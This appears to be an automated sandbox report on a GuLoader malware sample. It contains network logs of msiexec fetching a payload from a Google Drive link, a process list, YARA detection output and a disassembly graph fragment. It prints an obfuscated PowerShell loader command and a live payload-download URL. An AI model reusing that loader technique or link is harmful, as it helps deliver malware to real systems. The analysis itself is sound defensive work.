                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:28 GMT
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Content-Security-Policy: script-src 'nonce-YlM5fySCOx6Y8U4HjFQK3Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          2025-01-11 00:31:28 UTC | 1652 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 49 53 43 2d 4c 4d 78 50 47 7a 73 5a 45 58 51 6a 4a 52 4f 67 33 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ISC-LMxPGzsZEXQjJROg3g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          38 | 192.168.2.9 | 50012 | 142.250.184.206 | 443 | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2025-01-11 00:31:29 UTC | 417 | OUT | GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:29 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:29 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Content-Security-Policy: script-src 'nonce-AjZiKLPqO9iU_jUcBqFK0g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          39 | 192.168.2.9 | 50013 | 142.250.181.225 | 443 | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2025-01-11 00:31:30 UTC | 459 | OUT | GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          2025-01-11 00:31:30 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgSsJaHM8ZID_RUSr7QbhDc8egCOSyxw-vTHGGN_a2ursp8JJtiTVsdzWf5v12yuLjpv
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:30 GMT
                                                          Content-Security-Policy: script-src 'nonce-THGXdzEIljQTtz1jMGx2Eg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          Timestamp: 2025-01-11 00:31:30 UTC | Bytes transferred: 1652 | Direction: IN
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="7s6FoRDQPg5Sliuv3_JUjw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session ID: 40 | Source IP: 192.168.2.9 | Source Port: 50014 | Destination IP: 142.250.184.206 | Destination Port: 443 | PID: 3848 | Process: C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp: 2025-01-11 00:31:31 UTC | Bytes transferred: 417 | Direction: OUT
                                                          GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          Timestamp: 2025-01-11 00:31:31 UTC | Bytes transferred: 1920 | Direction: IN
                                                          HTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:31 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Content-Security-Policy: script-src 'nonce-5t7DYpVv5JeibDD78mMMrg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session ID: 41 | Source IP: 192.168.2.9 | Source Port: 50015 | Destination IP: 142.250.181.225 | Destination Port: 443 | PID: 3848 | Process: C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp: 2025-01-11 00:31:32 UTC | Bytes transferred: 459 | Direction: OUT
                                                          GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          Timestamp: 2025-01-11 00:31:33 UTC | Bytes transferred: 1851 | Direction: IN
                                                          HTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgT4QN3obU-V2e7G99WZnyN8KpP8aAjoPYkkZ7uDjxRFd5epXCJwcsQsaoE6Fs2WzXySb2heQEY
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:32 GMT
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-1vMHemRUBHz9hacSIoVhfA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          Timestamp: 2025-01-11 00:31:33 UTC | Bytes transferred: 1652 | Direction: IN
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="MNIwH8mShqdvHmsPC04RnQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                          Session ID: 42 | Source IP: 192.168.2.9 | Source Port: 50016 | Destination IP: 142.250.184.206 | Destination Port: 443 | PID: 3848 | Process: C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp: 2025-01-11 00:31:33 UTC | Bytes transferred: 417 | Direction: OUT
                                                          GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          Timestamp: 2025-01-11 00:31:34 UTC | Bytes transferred: 1920 | Direction: IN
                                                          HTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:34 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-v9CtMqvkF6hKcpf430QXjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session ID: 43 | Source IP: 192.168.2.9 | Source Port: 50017 | Destination IP: 142.250.181.225 | Destination Port: 443 | PID: 3848 | Process: C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp: 2025-01-11 00:31:35 UTC | Bytes transferred: 459 | Direction: OUT
                                                          GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          Cookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
                                                          Timestamp: 2025-01-11 00:31:35 UTC | Bytes transferred: 1851 | Direction: IN
                                                          HTTP/1.1 404 Not Found
                                                          X-GUploader-UploadID: AFIdbgROWE_2dDeHaLLZtcWPyE7Jx_B8G3488R9h9pJHV7g3738by8f8BJK49aECD8EJADFHLXaRtgc
                                                          Content-Type: text/html; charset=utf-8
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:31:35 GMT
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy: script-src 'nonce-SE2xFG62UeOZ9hImxd_QNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Content-Length: 1652
                                                          Server: UploadServer
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Content-Security-Policy: sandbox allow-scripts
                                                          Connection: close
                                                          Timestamp: 2025-01-11 00:31:35 UTC | Bytes transferred: 1652 | Direction: IN
                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="lFXcPzCcerKh7vSraJr1Fg">*{margin:0;padding:0}html,code{font:15px/22px arial



                                                          Target ID:0
                                                          Start time:19:29:30
                                                          Start date:10/01/2025
                                                          Path:C:\Users\user\Desktop\YrCSUX2O3I.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\YrCSUX2O3I.exe"
                                                          Imagebase:0x400000
                                                          File size:1'069'784 bytes
                                                          MD5 hash:13DCCF3D94C8435353A3BF886CA19E7E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:19:29:33
                                                          Start date:10/01/2025
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"powershell.exe" -windowstyle minimized "$Willock=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Hjtryks.Tog';$Fysiologen=$Willock.SubString(2860,3);.$Fysiologen($Willock)"
                                                          Imagebase:0x560000
                                                          File size:433'152 bytes
                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:19:29:33
                                                          Start date:10/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:8
                                                          Start time:19:30:35
                                                          Start date:10/01/2025
                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                          Imagebase:0xfc0000
                                                          File size:59'904 bytes
                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000002.2577978803.000000000452E000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:high
                                                          Has exited:false


                                                            Execution Graph

                                                            Execution Coverage:22.3%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:21.7%
                                                            Total number of Nodes:1267
                                                            Total number of Limit Nodes:30
3119->3123 3120 4034af 3122 405529 MessageBoxIndirectW 3120->3122 3127 4034bd ExitProcess 3122->3127 3128 4035b4 3123->3128 3129 4058b6 18 API calls 3125->3129 3126->3107 3130 4034e1 CreateDirectoryW SetCurrentDirectoryW 3126->3130 3131 4060b0 3 API calls 3128->3131 3132 40346c 3129->3132 3133 403504 3130->3133 3134 4034f9 3130->3134 3137 4035bd 3131->3137 3132->3107 3251 405d46 lstrcpynW 3132->3251 3261 405d46 lstrcpynW 3133->3261 3260 405d46 lstrcpynW 3134->3260 3139 4060b0 3 API calls 3137->3139 3141 4035c6 3139->3141 3140 40347b 3252 405d46 lstrcpynW 3140->3252 3144 403614 ExitWindowsEx 3141->3144 3149 4035d4 GetCurrentProcess 3141->3149 3143 405d68 18 API calls 3145 403543 DeleteFileW 3143->3145 3144->3121 3146 403621 3144->3146 3147 403550 CopyFileW 3145->3147 3155 403512 3145->3155 3262 40140b 3146->3262 3147->3155 3151 4035e4 3149->3151 3150 403599 3152 405be0 40 API calls 3150->3152 3151->3144 3152->3107 3153 405be0 40 API calls 3153->3155 3154 405d68 18 API calls 3154->3155 3155->3143 3155->3150 3155->3153 3155->3154 3156 4054c8 2 API calls 3155->3156 3157 403584 CloseHandle 3155->3157 3156->3155 3157->3155 3158->3089 3159->3091 3161 405fda 5 API calls 3160->3161 3162 4031b5 3161->3162 3163 4031bf 3162->3163 3164 4057ae 3 API calls 3162->3164 3163->3098 3165 4031c7 CreateDirectoryW 3164->3165 3265 4059fe 3165->3265 3269 4059cf GetFileAttributesW CreateFileW 3168->3269 3170 402d3f 3189 402d4f 3170->3189 3270 405d46 lstrcpynW 3170->3270 3172 402d65 3173 4057fa 2 API calls 3172->3173 3174 402d6b 3173->3174 3271 405d46 lstrcpynW 3174->3271 3176 402d76 GetFileSize 3177 402e72 3176->3177 3195 402d8d 3176->3195 3272 402c9b 3177->3272 3179 402e7b 3181 402eab GlobalAlloc 3179->3181 3179->3189 3283 403192 SetFilePointer 3179->3283 3180 403160 ReadFile 3180->3195 3284 403192 SetFilePointer 3181->3284 3183 402ede 3186 402c9b 6 API calls 3183->3186 3185 402ec6 3188 402f38 33 API calls 3185->3188 3186->3189 3187 402e94 3190 403160 ReadFile 3187->3190 3193 402ed2 
